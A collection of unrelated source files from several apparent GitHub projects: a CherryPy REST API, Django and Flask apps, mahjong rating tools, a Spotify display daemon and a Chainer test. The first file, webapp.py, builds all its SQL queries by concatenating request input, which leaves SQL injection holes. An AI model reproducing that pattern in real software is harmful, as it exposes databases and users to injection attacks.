#### File: JEStaubach/playrestapi/webapp.py
```python
import cherrypy
import json
from collections import OrderedDict
import mysql.connector
import db_conf
import sys
import atexit
import os
import os.path
from oauth2client import client, crypt
import urllib2
from urlparse import urlparse
#sys.stdout = sys.stderr
#cherrypy.config.update({'environment': 'embedded'})
client_id = '105600165694-08orfb5k9o0tit237hnohila4m694ufu.apps.googleusercontent.com'
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
def get_list(args):
list_name = args[0]
return_vals = []
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT * FROM " + list_name)
cursor.execute(query)
for row in cursor:
return_vals.append(dict(row))
cursor.close()
cnx.close()
return return_vals
def remove_row(args):
list_name = args[0]
id = args[1]
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
cmd = "DELETE FROM " + list_name + "_tbl WHERE " + list_name + "_tbl." + list_name[:-1] + "_id = " + id
query = cmd
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
return {'method': 'DELETE', 'status': 'success'}
def create_row(args):
new_data = args[0]
list_name = args[1]
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
cmd = "INSERT INTO " + list_name + "_tbl (" + ",".join(new_data.keys())+") VALUES (" + ",".join([ "'" + new_data[key] + "'" for key in new_data]) + ")"
query = cmd
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
return {'method': 'POST', 'status': 'success'}
def update_row(args):
new_data = args[0]
list_name = args[1]
id = args[2]
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
cmd = "UPDATE " + list_name + "_tbl SET " + ','.join([key + " = '" + new_data[key] + "'" for key in new_data.keys()]) + " WHERE " + list_name + "_tbl." + list_name[:-1] + "_id = " + id
print(cmd)
query = cmd
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
return {'method': 'UPDATE', 'status': 'success'}
def verify(token):
print('signin')
try:
idinfo = client.verify_id_token(token, None)
if idinfo['aud'] not in [client_id]:
raise crypt.AppIdentityError("Unrecognized client.")
if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
raise crypt.AppIdentityError("Wrong issuer.")
except crypt.AppIdentityError:
return {'status': 'token validation failed'}
email = idinfo['email']
print(email)
return_vals = []
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT * FROM users WHERE user_email = '" + email + "'")
cursor.execute(query)
for row in cursor:
return_vals.append(dict(row))
cursor.close()
cnx.close()
if len(return_vals) > 0:
login_succeeded(email)
return {'status': 'success', 'permissions': return_vals[0]['user_permissions']}
else:
login_failed(email)
return {'status': 'user not registered'}
def login_failed(email):
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT * FROM failedlogins WHERE failedlogin_email = '" + email + "'")
cursor.execute(query)
rows = []
for row in cursor:
rows.append(dict(row))
cursor.close()
cnx.close()
fail_count = 1
fail_id = None
if len(rows) > 0:
fail_count = rows[0]['failedlogin_count'] + 1
fail_id = rows[0]['failedlogin_id']
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
if fail_count == 1:
query = "INSERT INTO failedlogins_tbl ( failedlogin_email, failedlogin_count, failedlogin_lastdate, failedlogin_lasttime ) VALUES ( '" + email + "'," + str(fail_count) + ", CURDATE(), CURTIME() )"
else:
query = "UPDATE failedlogins_tbl SET failedlogin_count=" + str(fail_count) + ", failedlogin_lastdate=CURDATE(), failedlogin_lasttime=CURTIME() WHERE failedlogin_id = " + str(fail_id)
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
def login_succeeded(email):
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = "INSERT INTO logins_tbl ( login_email, login_date, login_time ) VALUES ( '" + email + "', CURDATE(), CURTIME() )"
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
class HoppersWebService(object):
exposed = True
exposed_views = {}
def __init__(self):
print('init called')
self.get_exposed_views()
print(str(self.exposed_views))
def get_exposed_views(self):
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB'][
'db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME IN (SELECT exposedview_name FROM exposedviews)")
cursor.execute(query)
self.exposed_views = {}
for row in cursor:
row_dict = dict(row)
if row_dict['TABLE_NAME'] not in self.exposed_views.keys():
self.exposed_views[str(row_dict['TABLE_NAME'])] = []
self.exposed_views[str(row_dict['TABLE_NAME'])].append({'column_name': row_dict['COLUMN_NAME'],
'column_type': row_dict['DATA_TYPE']})
cursor.close()
cnx.close()
def unhandled(self, method, url, args):
cherrypy.response.status = 404
return json.dumps({'method': method,
'resource': url,
'status': 'Unhandled resource location ' + str(args)})
def bad_fields(self, method, url, args, field_errors):
cherrypy.response.status = 400
return json.dumps({'method': method,
'resource': url,
'status': 'Unknown resource attributes: ' + str(field_errors)})
def collection_exposed(self, collection):
if collection in self.exposed_views.keys():
return True
else:
return False
def field_mismatches(self, collection, new_data):
allowed_fields = [x['column_name'] for x in self.exposed_views[collection]]
print('collection: ' + collection)
print('allowed_fields: ' + str(allowed_fields))
additional_supplied_fields = [x for x in new_data.keys() if x not in allowed_fields]
unsupplied_fields = [x for x in allowed_fields if x not in new_data.keys() and x != collection[:-1] + '_id']
tables_with_unsupplied_ids = [x[:-3] for x in unsupplied_fields if x[-3:] == '_id']
missing_fields = []
for table in tables_with_unsupplied_ids:
for field in new_data.keys():
if table in field:
missing_fields.append(table + '_id')
return {'additional_supplied_fields': additional_supplied_fields,
'unsupplied_fields': unsupplied_fields,
'missing_fields': missing_fields}
def check_token(self, token, method, url, cb, args):
if not token:
# token required in order to be verified
cherrypy.response.status = 401
return json.dumps({'method': method,
'resource': url,
'status': 'missing token'})
else:
crud = {'POST': 'C',
'GET': 'R',
'PUT': 'U',
'DELETE': 'D',}
authorization = verify(token)
if authorization['status'] == 'success':
# token is authentic and user is registered.
if crud[method] in authorization['permissions']:
# user has required permissions
return json.dumps(cb(args))
else:
# User lacks the permission required for this method
cherrypy.response.status = 403
return json.dumps({'method': method,
'resource': url,
'status': 'Insufficient privileges'})
elif authorization['status'] == 'token validation failed':
# bad token.
cherrypy.response.status = 401
cherrypy.response.headers['Location'] = url
return json.dumps({'method': method,
'resource': url,
'status': authorization['status']})
elif authorization['status'] == 'user not registered':
# token OK, but user not registered.
cherrypy.response.status = 401
cherrypy.response.headers['Location'] = url
return json.dumps({'method': method,
'resource': url,
'status': authorization['status']})
else:
# token verification - unhandled response
cherrypy.response.status = 401
cherrypy.response.headers['Location'] = url
return json.dumps({'method': method,
'resource': url,
'status': authorization['status']})
def GET(self, *args, **kwargs):
print('GET:'+str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
if not args:
args = [None, None]
if args[0] == 'hoppers' and args[1] == 'manage':
return self.manage()
elif args[0] == 'hoppers' and args[1] == 'rest':
if not token:
# Attempt to access a resource or collection without including token.
# Redirect to login page, pass along the requested URL in Location header.
cherrypy.response.headers['Location'] = url
raise cherrypy.HTTPRedirect("/hoppers/manage/#/" + args[2])
else:
if not self.collection_exposed(args[2]):
return self.unhandled('GET', url, args[2:])
return self.check_token(token, 'GET', url, get_list, args[2:])
elif args[0] == 'hoppers' and args[1] == 'tokensignin':
def on_success(args=None):
return json.dumps({'method': 'GET',
'resource': url,
'status': 'success',})
return self.check_token(token, 'GET', url, on_success, None)
else:
return self.unhandled('GET', url, args)
def POST(self, *args):
print('POST '+str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
rawData = cherrypy.request.body.read(int(cherrypy.request.headers['Content-Length']))
new_data = json.loads(rawData)
print('post data: '+str(new_data))
if args[0] == 'hoppers' and args[1] == 'rest':
if not self.collection_exposed(args[2]):
return self.unhandled('POST', url, args[2:])
field_errors = self.field_mismatches(args[2], new_data)
if field_errors['additional_supplied_fields'] or field_errors['unsupplied_fields']:
return self.bad_fields('POST', url, args[2:], field_errors)
return self.check_token(token, 'POST', url, create_row, [new_data] + list(args[2:]))
else:
return self.unhandled('POST', url, args)
def PUT(self, *args):
print('PUT ' + str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
rawData = cherrypy.request.body.read(int(cherrypy.request.headers['Content-Length']))
new_data = json.loads(rawData)
print('put data: ' + str(new_data))
if args[0] == 'hoppers' and args[1] == 'rest':
if not self.collection_exposed(args[2]):
return self.unhandled('PUT', url, args[2:])
field_errors = self.field_mismatches(args[2], new_data)
if field_errors['additional_supplied_fields'] or field_errors['missing_fields']:
return self.bad_fields('PUT', url, args[2:], field_errors)
return self.check_token(token, 'PUT', url, update_row, [new_data] + list(args[2:]))
else:
return self.unhandled('PUT', url, args)
def DELETE(self, *args):
print('DELETE ' + str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
#rawData = cherrypy.request.body.read(int(cherrypy.request.headers['Content-Length']))
#new_data = json.loads(rawData)
#print('delete data: ' + str(new_data))
if args[0] == 'hoppers' and args[1] == 'rest':
if not self.collection_exposed(args[2]):
return self.unhandled('DELETE', url, args[2:])
return self.check_token(token, 'DELETE', url, remove_row, args[2:])
else:
return self.unhandled('DELETE', url, args)
def serve_index(self):
print('index'+cherrypy.request.scheme)
print(db_conf.settings['static']['path'])
index_file = os.path.abspath(db_conf.settings['static']['path'] + 'index.html')
f = open( index_file, 'r' )
return f.read()
def manage(self):
index_file = os.path.abspath(db_conf.settings['static']['path'] + 'manage.html')
f = open( index_file, 'r' )
return f.read()
if __name__ == '__main__':
print("name {}".format(db_conf.settings['DB']['db_name']))
print("user {}".format(db_conf.settings['DB']['db_user']))
path = None
cherrypy.tree.mount(
HoppersWebService(),
'/',
{
'/hoppers/rest': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher()
},
'/hoppers/tokensignin': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher()
},
'/hoppers/manage': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher()
},
'/': {
'tools.staticdir.on': True,
'tools.staticdir.dir': os.path.abspath(db_conf.settings['static']['path']),
'tools.staticdir.index': 'index.html',
}
}, )
cherrypy.server.ssl_module = 'builtin'
cherrypy.server.ssl_certificate = "cert.pem"
cherrypy.server.ssl_private_key = "privkey.pem"
cherrypy.engine.start()
cherrypy.engine.block()
```
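The handlers above build SQL statements by concatenating request data directly into the query string. As a hedged alternative (not part of the original file), the same DELETE could use mysql.connector's parameter binding for the id value; identifiers such as table names cannot be bound, so they would still need to be whitelisted against something like `exposed_views`.

```python
# Sketch only: remove_row() rewritten with parameter binding for the row id.
import mysql.connector
import db_conf

def remove_row_safe(list_name, row_id, allowed_tables):
    # Table/column names cannot be bound, so check them against a whitelist first.
    if list_name not in allowed_tables:
        raise ValueError('unknown collection: {}'.format(list_name))
    cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
                                  password=db_conf.settings['DB']['db_pass'],
                                  host=db_conf.settings['DB']['db_host'],
                                  database=db_conf.settings['DB']['db_user'] + '$' +
                                           db_conf.settings['DB']['db_name'])
    cursor = cnx.cursor()
    query = ("DELETE FROM " + list_name + "_tbl WHERE " +
             list_name[:-1] + "_id = %s")              # value bound by the driver
    cursor.execute(query, (row_id,))
    cursor.close()
    cnx.commit()
    cnx.close()
    return {'method': 'DELETE', 'status': 'success'}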
|
{
"source": "JEStaubach/quickprompts",
"score": 2
}
|
#### File: quickprompts/quickprompts/selector_view_model.py
```python
from .common.util import Util
class SelectorViewModel(list):
# Properties
# Magic Methods
def __init__(self, options):
super(SelectorViewModel, self).__init__()
self._model = SelectorViewModel.generate_model(options)
self.bread_crumbs = []
self._children_indicator = '>>'
for item in self._format_options_list():
self.append(item)
# Public Methods
@staticmethod
def generate_model(options, delimiter='::'):
d = {}
lines = [line.strip() for line in options.split('\n') if line.strip()]
for line in lines:
sections = [x.strip() for x in line.split(delimiter) if x.strip()]
d = SelectorViewModel._chomp(sections, d)
return d
def step_into_item(self, selected):
if selected not in self:
raise ValueError(str(selected) +
' not found in SelectorViewModel')
if Util.str_ends_in_substr(selected, self._children_indicator):
selected_index = self.index(selected)
options = self._get_options_list()
options_text = sorted(options.keys())
option_selected = options_text[selected_index]
self.bread_crumbs.append(option_selected)
del self[:]
for item in self._format_options_list():
self.append(item)
def step_out_of_item(self):
item_stepped_out_of = ''
if self.bread_crumbs:
item_stepped_out_of = self.bread_crumbs[-1]
self.bread_crumbs.pop()
del self[:]
for item in self._format_options_list():
self.append(item)
return item_stepped_out_of
# Private Methods
@staticmethod
def _chomp(sections, d):
if sections:
if sections[0] not in d:
if sections[1:]:
d[sections[0]] = {}
else:
d[sections[0]] = {'': {}}
d[sections[0]] = SelectorViewModel._chomp(sections[1:],
d[sections[0]])
return d
def _format_options_list(self):
options = self._get_options_list()
options_text = sorted(options.keys())
formatted_options = []
for option_text in options_text:
if self._get_children(options[option_text]):
option_index = options_text.index(option_text)
padding = self._get_padding(options_text, option_index)
formatted_options.append(option_text +
padding +
self._children_indicator)
else:
formatted_options.append(option_text)
return sorted(formatted_options)
@staticmethod
def _get_children(option_children):
return [child for child in option_children.keys() if child]
@staticmethod
def _get_max_option_length(options):
return max([len(x) for x in options])
def _get_options_list(self):
page = self._model
for crumb in self.bread_crumbs:
if crumb not in page.keys():
raise ValueError(str(self.bread_crumbs) +
' : path traversal failed at ' +
str(crumb))
else:
page = page[crumb]
return page
@staticmethod
def _get_padding_amount(options, index):
option = options[index]
pad_to_length = SelectorViewModel._get_max_option_length(options) + 1
return pad_to_length - len(option)
@staticmethod
def _get_padding(options, index):
return ' ' * SelectorViewModel._get_padding_amount(options, index)
```
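A short usage sketch of the view model above, assuming the import path `quickprompts.selector_view_model`; the option strings are invented for illustration and the exact padding in the formatted entries may differ.

```python
# Hypothetical usage of SelectorViewModel with a '::'-delimited option string.
from quickprompts.selector_view_model import SelectorViewModel  # assumed import path

options = "Fruits::Apple\nFruits::Pear\nVegetables::Carrot\nQuit"
menu = SelectorViewModel(options)
print(list(menu))            # e.g. ['Fruits     >>', 'Quit', 'Vegetables >>'] (padding may vary)

branch = [item for item in menu if item.startswith('Fruits')][0]
menu.step_into_item(branch)  # descend into the 'Fruits' branch
print(list(menu))            # ['Apple', 'Pear']
menu.step_out_of_item()      # back to the top level
```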
|
{
"source": "Jester4Hire/mysite",
"score": 2
}
|
#### File: mysite/blog/views.py
```python
from django.views import generic
from django.utils import timezone
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from .models import Post
from .forms import CommentForm
from django.shortcuts import render, get_object_or_404
class PostList(generic.ListView):
queryset = Post.objects.filter(status=1).order_by('-created_on')
template_name = 'index.html'
paginate_by = 3
def PostList(request):
object_list = Post.objects.filter(status=1).order_by('-created_on')
paginator = Paginator(object_list, 3)
page = request.GET.get('page')
try:
post_list = paginator.page(page)
except PageNotAnInteger:
post_list = paginator.page(1)
except EmptyPage:
post_list = paginator.page(paginator.num_pages)
return render(request, 'index.html', {'page': page, 'post_list': post_list})
class PostDetail(generic.DetailView):
model = Post
template_name = 'post_detail.html'
def post_detail(request, slug):
template_name = 'post_detail.html'
post = get_object_or_404(Post, slug=slug)
comments = post.comments.filter(active=True)
new_comment = None
if request.method == 'POST':
comment_form = CommentForm(data=request.POST)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.post = post
new_comment.save()
else:
comment_form = CommentForm()
return render(request, template_name, {'post': post,
'comments': comments,
'new_comment': new_comment,
'comment_form': comment_form})
```
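For context, these views would typically be wired up in a `urls.py`; the sketch below is an assumption about that wiring (route names and patterns are invented), not part of this file.

```python
# Hypothetical urls.py for the views above.
from django.urls import path
from . import views

urlpatterns = [
    path('', views.PostList, name='home'),                    # list view
    path('<slug:slug>/', views.post_detail, name='post_detail'),  # detail view with comments
]
```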
|
{
"source": "Jesterboxboy/mahjong-portal",
"score": 2
}
|
#### File: management/commands/prepare_fixed_seating.py
```python
import json
import random
from django.core.management.base import BaseCommand
from online.team_seating import TeamSeating
from tournament.models import Tournament
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument("tournament_id", type=int)
def handle(self, *args, **options):
tournament_id = options["tournament_id"]
tournament = Tournament.objects.get(id=tournament_id)
assert tournament.tournament_type == Tournament.ONLINE
registrations = tournament.online_tournament_registrations.all()
pantheon_id_map = {}
for i, item in enumerate(registrations):
assert item.player.pantheon_id
pantheon_id_map[i + 1] = item.player.pantheon_id
with open(TeamSeating.initial_seating, "r") as f:
initial_seating = f.read()
rounds_text = initial_seating.splitlines()
rounds = []
for r in rounds_text:
seating = []
tables_text = r.split()
for t in tables_text:
players_ids = list(set([int(x) for x in t.split("-")]))
assert len(players_ids) == 4
random.shuffle(players_ids)
seating.append([pantheon_id_map[x] for x in players_ids])
rounds.append(seating)
data = {"seating": rounds}
with open(TeamSeating.processed_seating, "w") as f:
f.write(json.dumps(data))
print("Seating was saved to {}".format(TeamSeating.processed_seating))
# from player.models import Player
# from django.utils.translation import activate
# activate('ru')
# for i, round_item in enumerate(rounds):
# print(f'\nХанчан {i + 1}\n')
# for j, table in enumerate(round_item):
# print(f"Стол {j + 1}")
# print(', '.join([Player.objects.get(pantheon_id=x).full_name for x in table]))
```
#### File: management/commands/add_tenhou_account.py
```python
from django.core.management.base import BaseCommand
from django.utils import timezone
from player.models import Player
from player.tenhou.models import TenhouNickname
from utils.tenhou.helper import (
download_all_games_from_nodochi,
recalculate_tenhou_statistics_for_four_players,
save_played_games,
)
def get_date_string():
return timezone.now().strftime("%H:%M:%S")
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument("player_name", type=str)
parser.add_argument("tenhou_nickname", type=str)
def handle(self, *args, **options):
print("{0}: Start".format(get_date_string()))
temp = options.get("player_name").split(" ")
last_name = temp[0]
first_name = temp[1]
player = Player.objects.get(first_name_ru=first_name, last_name_ru=last_name)
tenhou_nickname = options.get("tenhou_nickname")
player_games, account_start_date, four_players_rate = download_all_games_from_nodochi(tenhou_nickname)
if not player_games:
print("Not correct account")
return
is_main = TenhouNickname.objects.filter(player=player, is_active=True).count() == 0
tenhou_object = TenhouNickname.objects.create(
is_main=is_main, player=player, tenhou_username=tenhou_nickname, username_created_at=account_start_date
)
save_played_games(tenhou_object, player_games)
recalculate_tenhou_statistics_for_four_players(tenhou_object, player_games, four_players_rate)
print("{0}: End".format(get_date_string()))
```
#### File: rating/calculation/common.py
```python
from datetime import timedelta
from dateutil.relativedelta import relativedelta
class RatingDatesMixin:
def get_date(self, rating_date):
# two years ago
return rating_date - timedelta(days=365 * 2)
def tournament_age(self, end_date, rating_date):
"""
Check about page for detailed description
"""
diff = relativedelta(rating_date, end_date)
part = (1 / 7) * 100
if diff.years < 1:
return 100
elif 1 <= diff.years < 2:
value = int(diff.months / 2 + 1)
return round(100 - (value * part), 2)
else:
return 0
```
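A small worked example of the age weighting above, using made-up dates; the import path is assumed from the file location.

```python
# Illustration of tournament_age(): tournaments within a year keep full weight,
# then decay in two-month steps during the second year, then drop to zero.
from datetime import date
from rating.calculation.common import RatingDatesMixin  # assumed import path

mixin = RatingDatesMixin()
rating_date = date(2020, 1, 1)
print(mixin.tournament_age(date(2019, 6, 1), rating_date))  # < 1 year old  -> 100
print(mixin.tournament_age(date(2018, 7, 1), rating_date))  # 1.5 years old -> 42.86
print(mixin.tournament_age(date(2017, 1, 1), rating_date))  # >= 2 years    -> 0
```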
|
{
"source": "jesterchen/jWeight",
"score": 3
}
|
#### File: jWeight/app/forms.py
```python
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.fields.html5 import DecimalField, DateField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, \
Optional
from app.models import User
from datetime import date
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
password2 = PasswordField(
'Repeat Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Register')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Please use a different username.')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is not None:
raise ValidationError('Please use a different email address.')
class MeasurementForm(FlaskForm):
date = DateField('Messdatum', validators=[DataRequired()],
default=date.today)
weight = DecimalField('Gewicht [kg]')
bmi = DecimalField('BMI', validators=[Optional()])
body_Fat = DecimalField('Koerperfett [%]', validators=[Optional()])
muscle = DecimalField('Muskelmasse [%]', validators=[Optional()])
rm_kcal = DecimalField('Grundumsatz [kcal]', validators=[Optional()])
visceral_fat = DecimalField('Viszeralfett', validators=[Optional()])
circumference = DecimalField('Bauchumfang [cm]', validators=[Optional()])
submit = SubmitField('Speichern', validators=[Optional()])
```
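A hedged sketch of how `MeasurementForm` might be used in a Flask view; the route, template name, and `Measurement` model are assumptions introduced only for illustration.

```python
# Hypothetical view handling MeasurementForm submissions.
from flask import render_template, redirect, url_for
from app import app, db
from app.forms import MeasurementForm
from app.models import Measurement  # assumed model

@app.route('/measure', methods=['GET', 'POST'])
def measure():
    form = MeasurementForm()
    if form.validate_on_submit():
        m = Measurement(date=form.date.data, weight=form.weight.data)
        db.session.add(m)
        db.session.commit()
        return redirect(url_for('measure'))
    return render_template('measure.html', form=form)
```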
|
{
"source": "Jestergum/pidi-spotify",
"score": 3
}
|
#### File: pidi-spotify/pidi_spotify/__init__.py
```python
import logging
import signal
import sys
import time
from pathlib import Path
from threading import Thread
import configargparse
import requests
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
from . import hook
from .fifo import FIFO
from .st7789 import DisplayST7789
__version__ = "0.0.1"
FIFO_NAME = "/tmp/pidi-spotify.fifo"
CACHE_DIR = "/tmp/pidi-spotify-cache/"
LOG_FILE = "/tmp/pidi-spotify.log"
CONF_FILE = "/etc/default/pidi-spotify"
running = False
class State:
def __init__(self):
self.running = True
self.started = 0
self.duration_ms = 0
self.position_ms = 0
# Arguments listed in order for update_overlay
self.shuffle = False
self.repeat = False
self.state = "play"
self.volume = 100
# self.progress is a computed property (defined below)
self.elapsed = 0
self.album_name = ""
self.artist_name = ""
self.track_name = ""
self._index = 0
@property
def progress(self):
elapsed_ms = (time.time() - self.started) * 1000
try:
return (self.position_ms + elapsed_ms) / self.duration_ms
except ZeroDivisionError:
return 0
def __iter__(self):
self._index = 0
return self
def __next__(self):
try:
result = [
self.shuffle,
self.repeat,
self.state,
self.volume,
self.progress,
self.elapsed,
self.album_name,
self.artist_name,
self.track_name,
][self._index]
self._index += 1
return result
except IndexError:
raise StopIteration
def command_volume(volume):
state.volume = int(volume)
def command_seek(position_ms):
try:
state.position_ms = int(position_ms)
except ValueError:
state.position_ms = 0
state.started = time.time()
def command_pause(track_id):
state.state = "pause"
def command_play(track_id):
state.state = "play"
def command_track(track_id, position_ms):
track = spotify.track(track_id)
image_url = None
album_id = track["album"]["id"]
state.duration_ms = int(track["duration_ms"])
command_seek(position_ms)
state.state = "play"
state.album_name = track["album"]["name"]
state.artist_name = track["album"]["artists"][0]["name"]
state.track_name = track["name"]
for image in track["album"]["images"]:
if image["height"] == 300:
image_url = image["url"]
image_cache_path = image_cache_dir / f"{album_id}.png"
if not image_cache_path.is_file():
logger.info("Fetching image for {state.album_name} ({album_id})")
image = requests.get(image_url)
with open(image_cache_path, "wb+") as f:
f.write(image.content)
display.update_album_art(image_cache_path)
def display_update():
while state.running:
display.update_overlay(*state)
display.redraw()
time.sleep(1.0 / args.fps)
def signal_handler(sig, frame):
state.running = False
def main():
global spotify, state, display, logger, image_cache_dir, args # TODO This is horrid, encapsulate in a class?
parser = configargparse.ArgParser(default_config_files=[CONF_FILE])
parser.add_argument("--fifo-name", default=FIFO_NAME, type=str)
parser.add_argument("--cache-dir", default=CACHE_DIR, type=str)
parser.add_argument("--log-file", default=LOG_FILE, type=str)
parser.add_argument("--fps", default=15, type=int)
parser.add_argument("--hook", default=False, action="store_true")
parser.add_argument("--client-id", default=None, type=str)
parser.add_argument("--client-secret", default=None, type=str)
DisplayST7789.add_args(parser)
args = parser.parse_args()
args.size = 240
if args.hook:
sys.exit(hook.main(args))
logger = logging.getLogger("pidi_spotify")
log_fh = logging.FileHandler(args.log_file)
log_fh.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
logger.addHandler(log_fh)
logger.setLevel(logging.WARNING)
fifo = FIFO(args.fifo_name)
display = DisplayST7789(args)
image_cache_dir = Path(args.cache_dir)
image_cache_dir.mkdir(exist_ok=True)
if args.client_id is not None and args.client_secret is not None:
auth_manager = SpotifyClientCredentials(client_id=args.client_id, client_secret=args.client_secret)
else:
auth_manager = SpotifyClientCredentials()
spotify = spotipy.Spotify(auth_manager=auth_manager)
state = State()
signal.signal(signal.SIGINT, signal_handler)
_t_display_update = Thread(target=display_update)
_t_display_update.start()
print(
f"""PiDi Spotify Running
Listening on FIFO: {args.fifo_name}
Image cache dir: {args.cache_dir}
Log file: {args.log_file}
Press Ctrl+C to exit
"""
)
with fifo as fifo:
while state.running:
command = fifo.read()
if command is None or len(command) == 0:
time.sleep(0.1)
continue
command = command.split(":")
command_args = command[1:]
command_fn = command[0]
try:
globals()[f"command_{command_fn}"](*command_args)
logger.info(f"Command {command_fn} args: {','.join(command_args)}")
except KeyError:
logger.error(f"Unrecognised command {command_fn}")
state.running = False
_t_display_update.join()
return 0
if __name__ == "__main__":
sys.exit(main())
```
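The service consumes colon-delimited commands (`volume:…`, `seek:…`, `track:…`, `pause:`, `play:`) from the FIFO. The sketch below shows a client pushing such commands; the newline framing is an assumption, since the `FIFO` reader class is defined elsewhere, and the track id is a placeholder.

```python
# Sketch of a producer writing commands into the FIFO the service listens on.
fifo_path = "/tmp/pidi-spotify.fifo"

def send(command):
    # Opening a named pipe for writing blocks until the service is reading it.
    with open(fifo_path, "w") as f:
        f.write(command + "\n")

send("volume:80")                    # handled by command_volume
send("track:SPOTIFY_TRACK_ID:0")     # handled by command_track (id is a placeholder)
send("pause:")                       # handled by command_pause
```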
|
{
"source": "jesterhazy/sagemaker-chainer-container",
"score": 2
}
|
#### File: integration/local/test_mnist.py
```python
from __future__ import absolute_import
import os
import numpy as np
import pytest
from sagemaker.chainer import Chainer
from sagemaker.predictor import csv_deserializer, csv_serializer, json_deserializer, json_serializer
from test.utils import test_utils
path = os.path.dirname(os.path.realpath(__file__))
mnist_path = os.path.join(path, '..', '..', 'resources', 'mnist')
data_dir = os.path.join(mnist_path, 'data')
role = 'unused/dummy-role'
def test_chainer_mnist_single_machine(docker_image, sagemaker_local_session, instance_type, tmpdir):
customer_script = 'single_machine_customer_script.py'
hyperparameters = {'batch-size': 10000, 'epochs': 1}
estimator = Chainer(entry_point=customer_script,
source_dir=mnist_path,
role=role,
image_name=docker_image,
train_instance_count=1,
train_instance_type=instance_type,
sagemaker_session=sagemaker_local_session,
hyperparameters=hyperparameters,
output_path='file://{}'.format(tmpdir))
estimator.fit({'train': 'file://{}'.format(os.path.join(data_dir, 'train')),
'test': 'file://{}'.format(os.path.join(data_dir, 'test'))})
success_files = {
'model': ['model.npz'],
'output': ['success', 'data/accuracy.png', 'data/cg.dot', 'data/log', 'data/loss.png'],
}
test_utils.files_exist(str(tmpdir), success_files)
request_data = np.zeros((100, 784), dtype='float32')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type)
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
csv_serializer, csv_deserializer, 'text/csv')
